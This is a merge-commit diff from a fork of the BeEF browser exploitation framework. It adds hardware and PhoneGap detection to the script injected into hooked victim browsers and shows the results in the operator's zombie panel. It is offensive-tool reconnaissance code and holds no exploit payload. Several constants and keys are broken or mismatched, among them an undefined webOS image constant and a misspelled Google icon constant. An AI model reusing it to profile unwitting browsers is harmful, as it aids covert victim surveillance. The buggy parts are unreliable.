Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge remote branch 'upstream/master'

Browse Source
This commit is contained in:
bmantra
2012-06-27 20:18:05 +02:00
parent 286d0a18fb 1e0f83d23f
commit 17f5689bf8
46 changed files with 749 additions and 191 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
core/core.rb
View File

@@ -34,6 +34,7 @@ require 'core/main/constants/browsers'
require 'core/main/constants/commandmodule'
require 'core/main/constants/distributedengine'
require 'core/main/constants/os'
require 'core/main/constants/hardware'
# @note Include core modules for beef
require 'core/main/configuration'

10
core/filters/browser.rb
View File

@@ -47,6 +47,16 @@ module Filters
true
end
# Check the Hardware name value - for example, 'iPhone'
# @param [String] str String for testing
# @return [Boolean] If the string has valid Hardware name characters
def self.is_valid_hwname?(str)
return false if not is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length < 2
true
end
# Verify the browser version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser version characters

17
core/main/client/browser.js
View File

@@ -551,6 +551,19 @@ beef.browser = {
},
/**
* Checks if the Phonegap API is available from the hooked domain.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasJava()) { ... }
*/
hasPhonegap: function() {
var result = false;
try { if (!!device.phonegap) result = true; else result = false; }
catch(e) { result = false; }
return result;
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -765,6 +778,7 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var hw_name = beef.hardware.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_size = beef.browser.getScreenSize();
@@ -772,6 +786,7 @@ beef.browser = {
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
@@ -789,6 +804,7 @@ beef.browser = {
if(hostport) details["HostPort"] = hostport;
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(hw_name) details['Hardware'] = hw_name;
if(date_stamp) details['DateStamp'] = date_stamp;
if(system_platform) details['SystemPlatform'] = system_platform;
if(browser_type) details['BrowserType'] = browser_type;
@@ -797,6 +813,7 @@ beef.browser = {
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
if(has_phonegap) details['HasPhonegap'] = has_phonegap
if(has_web_socket) details['HasWebSocket'] = has_web_socket
if(has_googlegears) details['HasGoogleGears'] = has_googlegears
if(has_activex) details['HasActiveX'] = has_activex;

91
core/main/client/hardware.js Normal file
View File

@@ -0,0 +1,91 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.hardware = {
ua: navigator.userAgent,
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
isIpad: function() {
return (this.ua.indexOf('iPad') != -1) ? true : false;
},
isIpod: function() {
return (this.ua.indexOf('iPod') != -1) ? true : false;
},
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
isBlackBerry: function() {
return (this.ua.match('BlackBerry')) ? true : false;
},
isZune: function() {
return (this.ua.match('ZuneWP7')) ? true : false;
},
isKindle: function() {
return (this.ua.match('Kindle')) ? true : false;
},
isHtc: function() {
return (this.ua.match('HTC')) ? true : false;
},
isEricsson: function() {
return (this.ua.match('Ericsson')) ? true : false;
},
isNokia: function() {
return (this.ua.match('Nokia')) ? true : false;
},
isMotorola: function() {
return (this.ua.match('Motorola')) ? true : false;
},
isGoogle: function() {
return (this.ua.match('Nexus One')) ? true : false;
},
getName: function() {
if (this.isNokia()) return 'Nokia';
if (this.isWinPhone()) return 'Windows Phone';
if (this.isBlackBerry()) return 'BlackBerry';
if (this.isIphone()) return 'iPhone';
if (this.isIpad()) return 'iPad';
if (this.isIpod()) return 'iPod';
if (this.isKindle()) return 'Kindle';
if (this.isHtc()) return 'HTC';
if (this.isMotorola()) return 'Motorola';
if (this.isZune()) return 'Zune';
if (this.isGoogle()) return 'Google';
if (this.isEricsson()) return 'Ericsson';
return 'Unknown';
}
};
beef.regCmp('beef.net.hardware');

20
core/main/client/os.js
View File

@@ -72,7 +72,11 @@ beef.os = {
isMacintosh: function() {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
@@ -97,6 +101,10 @@ beef.os = {
return (this.ua.match('BlackBerry')) ? true : false;
},
isWebOS: function() {
return (this.ua.match('webOS')) ? true : false;
},
isQNX: function() {
return (this.ua.match('QNX')) ? true : false;
},
@@ -139,11 +147,14 @@ beef.os = {
if(this.isSunOS()) return 'Sun OS';
//iPhone
if (this.isIphone()) return 'iPhone';
if (this.isIphone()) return 'iOS';
//iPad
if (this.isIpad()) return 'iPad';
if (this.isIpad()) return 'iOS';
//iPod
if (this.isIpod()) return 'iPod';
if (this.isIpod()) return 'iOS';
// zune
//if (this.isZune()) return 'Zune';
//macintosh
if(this.isMacintosh()) {
@@ -156,6 +167,7 @@ beef.os = {
//others
if(this.isQNX()) return 'QNX';
if(this.isBeOS()) return 'BeOS';
if(this.isWebOS()) return 'webOS';
return 'unknown';
}

89
core/main/constants/hardware.rb Normal file
View File

@@ -0,0 +1,89 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Constants
# @note The hardware's strings for hardware detection.
module Hardware
HW_UNKNOWN_IMG = 'pc.png'
HW_IPHONE_UA_STR = 'iPhone'
HW_IPHONE_IMG = 'iphone.jpg'
HW_IPAD_UA_STR = 'iPad'
HW_IPAD_IMG = 'ipad.png'
HW_IPOD_UA_STR = 'iPod'
HW_IPOD_IMG = 'ipod.jpg'
HW_BLACKBERRY_UA_STR = 'BlackBerry'
HW_BLACKBERRY_IMG = 'blackberry.png'
HW_WINPHONE_UA_STR = 'Windows Phone'
HW_WINPHONE_IMG = 'win.png'
HW_ZUNE_UA_STR = 'ZuneWP7'
HW_ZUNE_IMG = 'zune.gif'
HW_KINDLE_UA_STR = 'Kindle'
HW_KINDLE_IMG = 'kindle.png'
HW_NOKIA_UA_STR = 'Nokia'
HW_NOKIA_IMG = 'nokia.ico'
HW_HTC_UA_STR = 'HTC'
HW_HTC_IMG = 'htc.ico'
HW_MOTOROLA_UA_STR = 'motorola'
HW_MOTOROLA_IMG = 'motorola.png'
HW_GOOGLE_UA_STR = 'Nexus One'
HE_GOOGLE_IM = 'nexus.png'
HW_ERICSSON_UA_STR = 'Ericsson'
HW_ERICSSON_IMG = 'sony_ericsson.png'
HW_ALL_UA_STR = 'All'
# Attempt to match operating system string to constant
# @param [String] name Name of operating system
# @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched
def self.match_hardware(name)
case name.downcase
when /iphone/
HW_IPHONE_UA_STR
when /ipad/
HW_IPAD_UA_STR
when /ipod/
HW_IPOD_UA_STR
when /blackberry/
HW_BLACKBERRY_UA_STR
when /windows phone/
HW_WINPHONE_UA_STR
when /zune/
HW_ZUNE_UA_STR
when /kindle/
HW_KINDLE_UA_STR
when /nokia/
HW_NOKIA_UA_STR
when /motorola/
HW_MOTOROLA_UA_STR
when /htc/
HW_HTC_UA_STR
when /google/
HW_GOOGLE_UA_STR
when /ericsson/
HW_ERICSSON_UA_STR
else
'ALL'
end
end
end
end
end
end

131
core/main/constants/os.rb
View File

@@ -15,75 +15,74 @@
#
module BeEF
module Core
module Constants
# @note The OS'es strings for os detection.
module Os
OS_UNKNOWN_IMG = 'unknown.png'
OS_WINDOWS_UA_STR = 'Windows'
OS_WINDOWS_IMG = 'win.png'
OS_LINUX_UA_STR = 'Linux'
OS_LINUX_IMG = 'linux.png'
OS_MAC_UA_STR = 'Mac'
OS_MAC_IMG = 'mac.png'
OS_QNX_UA_STR = 'QNX'
OS_QNX_IMG = 'qnx.ico'
OS_BEOS_UA_STR = 'BeOS'
OS_BEOS_IMG = 'beos.png'
OS_OPENBSD_UA_STR = 'OpenBSD'
OS_OPENBSD_IMG = 'openbsd.ico'
OS_IPHONE_UA_STR = 'iPhone'
OS_IPHONE_IMG = 'iphone.png'
OS_IPAD_UA_STR = 'iPad'
OS_IPAD_IMG = 'ipad.png'
OS_IPOD_UA_STR = 'iPod'
OS_IPOD_IMG = 'ipod.jpg'
OS_MAEMO_UA_STR = 'Maemo'
OS_MAEMO_IMG = 'maemo.ico'
OS_BLACKBERRY_UA_STR = 'BlackBerry'
OS_BLACKBERRY_IMG = 'blackberry.png'
OS_ANDROID_UA_STR = 'Android'
OS_ANDROID_IMG = 'android.png'
OS_ALL_UA_STR = 'All'
module Core
module Constants
# @note The OS'es strings for os detection.
module Os
OS_UNKNOWN_IMG = 'unknown.png'
OS_WINDOWS_UA_STR = 'Windows'
OS_WINDOWS_IMG = 'win.png'
OS_LINUX_UA_STR = 'Linux'
OS_LINUX_IMG = 'linux.png'
OS_MAC_UA_STR = 'Mac'
OS_MAC_IMG = 'mac.png'
OS_QNX_UA_STR = 'QNX'
OS_QNX_IMG = 'qnx.ico'
OS_BEOS_UA_STR = 'BeOS'
OS_BEOS_IMG = 'beos.png'
OS_OPENBSD_UA_STR = 'OpenBSD'
OS_OPENBSD_IMG = 'openbsd.ico'
OS_IOS_UA_STR = 'iOS'
OS_IOS_IMG = 'ios.png'
OS_IPHONE_UA_STR = 'iPhone'
OS_WEBOS_UA_STR = 'webos.png'
OS_IPHONE_IMG = 'iphone.jpg'
OS_IPAD_UA_STR = 'iPad'
OS_IPAD_IMG = 'ipad.png'
OS_IPOD_UA_STR = 'iPod'
OS_IPOD_IMG = 'ipod.jpg'
OS_MAEMO_UA_STR = 'Maemo'
OS_MAEMO_IMG = 'maemo.ico'
OS_BLACKBERRY_UA_STR = 'BlackBerry'
OS_BLACKBERRY_IMG = 'blackberry.png'
OS_ANDROID_UA_STR = 'Android'
OS_ANDROID_IMG = 'android.png'
OS_ALL_UA_STR = 'All'
# Attempt to match operating system string to constant
# @param [String] name Name of operating system
# @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched
def self.match_os(name)
case name.downcase
when /win/
OS_WINDOWS_UA_STR
when /lin/
OS_LINUX_UA_STR
when /os x/, /osx/, /mac/
OS_MAC_UA_STR
when /qnx/
OS_QNX_UA_STR
when /beos/
OS_BEOS_UA_STR
when /openbsd/
OS_OPENBSD_UA_STR
when /iphone/
OS_IPHONE_UA_STR
when /ipad/
OS_IPAD_UA_STR
when /ipod/
OS_IPOD_UA_STR
when /maemo/
OS_MAEMO_UA_STR
when /blackberry/
OS_BLACKBERRY_UA_STR
when /android/
OS_ANDROID_UA_STR
else
'ALL'
end
end
def self.match_os(name)
case name.downcase
when /win/
OS_WINDOWS_UA_STR
when /lin/
OS_LINUX_UA_STR
when /os x/, /osx/, /mac/
OS_MAC_UA_STR
when /qnx/
OS_QNX_UA_STR
when /beos/
OS_BEOS_UA_STR
when /openbsd/
OS_OPENBSD_UA_STR
when /ios/, /iphone/, /ipad/, /ipod/
OS_IOS_UA_STR
when /maemo/
OS_MAEMO_UA_STR
when /blackberry/
OS_BLACKBERRY_UA_STR
when /android/
OS_ANDROID_UA_STR
else
'ALL'
end
end
end
end
end
end
end
end

16
core/main/handlers/browserdetails.rb
View File

@@ -118,6 +118,14 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
# get and store the hardware name
hw_name = get_param(@data['results'], 'Hardware')
if BeEF::Filters.is_valid_hwname?(hw_name)
BD.set(session_id, 'Hardware', hw_name)
else
self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
end
# get and store the date
date_stamp = get_param(@data['results'], 'DateStamp')
if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -222,6 +230,14 @@ module BeEF
self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasPhonegap
has_phonegap = get_param(@data['results'], 'HasPhonegap')
if BeEF::Filters.is_valid_yes_no?(has_phonegap)
BD.set(session_id, 'HasPhonegap', has_phonegap)
else
self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasGoogleGears
has_googlegears = get_param(@data['results'], 'HasGoogleGears')
if BeEF::Filters.is_valid_yes_no?(has_googlegears)

4
core/main/handlers/modules/beefjs.rb
View File

@@ -32,9 +32,9 @@ module Modules
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
end
# @note construct the beefjs string from file(s)

36
core/main/models/browserdetails.rb
View File

@@ -62,7 +62,7 @@ module Models
browserdetails
end
#
# Returns the icon representing the browser type the
# hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +94,10 @@ module Models
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +106,33 @@ module Models
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end
#
# Returns the icon representing the hardware the
# zombie is running on (i.e. iPhone, BlackBerry)
#
def self.hw_icon(session_id)
ua_string = get(session_id, 'BrowserReportedName')
return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
end
end
end

32
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -136,7 +136,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
if not host_name.nil?
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
@@ -148,6 +148,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the hardware name
hw_name = BD.get(zombie_session, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
@@ -331,6 +346,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for hasPhonegap
has_phonegap = BD.get(zombie_session, 'hasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
if not has_googlegears.nil?

187
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -14,94 +14,115 @@
# limitations under the License.
#
module BeEF
module Extension
module AdminUI
module Controllers
module Extension
module AdminUI
module Controllers
#
#
#
class Panel < BeEF::Extension::AdminUI::HttpController
def initialize
super({
'paths' => {
'/' => method(:index),
'/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update)
}
})
end
# default index page
def index; end
# return a JSON object contains all the updates for the hooked browser trees
def hooked_browser_tree_update
# retrieve the hbs that are online
hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)))
# retrieve the hbs that are offline
hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)))
# retrieve the distributed engine rules that are enabled
distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true))
# hash that gets populated with all the information for the hb trees
ret = {
'success' => true,
# the list of hb
'hooked-browsers' => {
'online' => hooked_browsers_online,
'offline' => hooked_browsers_offline
},
# the rules for the distributed engine
'ditributed-engine-rules' => distributed_engine_rules
}
@body = ret.to_json
end
# Takes a list distributed engine rules and format the results into JSON
def distributed_engine_rules_2_json_simple(rules)
class Panel < BeEF::Extension::AdminUI::HttpController
end
# Takes a list of zombies and format the results in a JSON array.
def zombies2json_simple(zombies)
zombies_hash = {}
i = 0
zombies.each do |zombie|
# create hash of zombie details
zombies_hash[i] = (get_simple_hooked_browser_hash(zombie))
i+=1
def initialize
super({
'paths' => {
'/' => method(:index),
'/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update)
}
})
end
# default index page
def index;
end
# return a JSON object contains all the updates for the hooked browser trees
def hooked_browser_tree_update
# retrieve the hbs that are online
hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)))
# retrieve the hbs that are offline
hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)))
# retrieve the distributed engine rules that are enabled
distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true))
# hash that gets populated with all the information for the hb trees
ret = {
'success' => true,
# the list of hb
'hooked-browsers' => {
'online' => hooked_browsers_online,
'offline' => hooked_browsers_offline
},
# the rules for the distributed engine
'ditributed-engine-rules' => distributed_engine_rules
}
@body = ret.to_json
end
# Takes a list distributed engine rules and format the results into JSON
def distributed_engine_rules_2_json_simple(rules)
end
# Takes a list of zombies and format the results in a JSON array.
def zombies2json_simple(zombies)
zombies_hash = {}
i = 0
zombies.each do |zombie|
# create hash of zombie details
zombies_hash[i] = (get_simple_hooked_browser_hash(zombie))
i+=1
end
zombies_hash
end
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
return {
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_name' => browser_name,
'browser_version' => browser_version,
'browser_icon' => browser_icon,
'os_icon' => os_icon,
'os_name' => os_name,
'hw_icon' => hw_icon,
'hw_name' => hw_name,
'has_flash' => has_flash,
'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears,
'has_java' => has_java,
'date_stamp' => date_stamp
}
end
end
end
end
zombies_hash
end
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
return {
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_icon' => browser_icon,
'os_icon' => os_icon
}
end
end
end
end
end
end

BIN
extensions/admin_ui/media/images/icons/htc.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
extensions/admin_ui/media/images/icons/ios.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.2 KiB

BIN
extensions/admin_ui/media/images/icons/iphone.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.7 KiB

BIN
extensions/admin_ui/media/images/icons/iphone.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.5 KiB

BIN
extensions/admin_ui/media/images/icons/kindle.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.3 KiB

BIN
extensions/admin_ui/media/images/icons/motorola.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.6 KiB

BIN
extensions/admin_ui/media/images/icons/nexus.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 7.3 KiB

BIN
extensions/admin_ui/media/images/icons/nokia.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
extensions/admin_ui/media/images/icons/pc.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.5 KiB

BIN
extensions/admin_ui/media/images/icons/sony_ericsson.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.5 KiB

BIN
extensions/admin_ui/media/images/icons/webos.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.5 KiB

BIN
extensions/admin_ui/media/images/icons/zune.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.7 KiB

51
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -20,18 +20,49 @@ var ZombiesMgr = function(zombies_tree_lists) {
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
text = "<img src='/ui/media/images/icons/"+escape(zombie_array[index]["browser_icon"])+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text += "<img src='/ui/media/images/icons/"+escape(zombie_array[index]["os_icon"])+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text += zombie_array[index]["ip"];
var ip = zombie_array[index]["ip"];
var session = zombie_array[index]["session"];
var browser_name = zombie_array[index]["browser_name"];
var browser_version = zombie_array[index]["browser_version"];
var browser_icon = zombie_array[index]["browser_icon"];
var os_icon = zombie_array[index]["os_icon"];
var os_name = zombie_array[index]["os_name"];
var hw_name = zombie_array[index]["hw_name"];
var hw_icon = zombie_array[index]["hw_icon"];
var domain = zombie_array[index]["domain"];
var port = zombie_array[index]["port"];
var has_flash = zombie_array[index]["has_flash"];
var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"];
var date_stamp = zombie_array[index]["date_stamp"];
text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= ip;
balloon_text = "IP: " + ip;
balloon_text+= "<br/>Browser: " + browser_name + " " + browser_version;
balloon_text+= "<br/>System: " + os_name;
balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp;
var new_zombie = {
'id' : index,
'ip' : zombie_array[index]["ip"],
'session' : zombie_array[index]["session"],
'text': text,
'check' : false,
'domain' : zombie_array[index]["domain"],
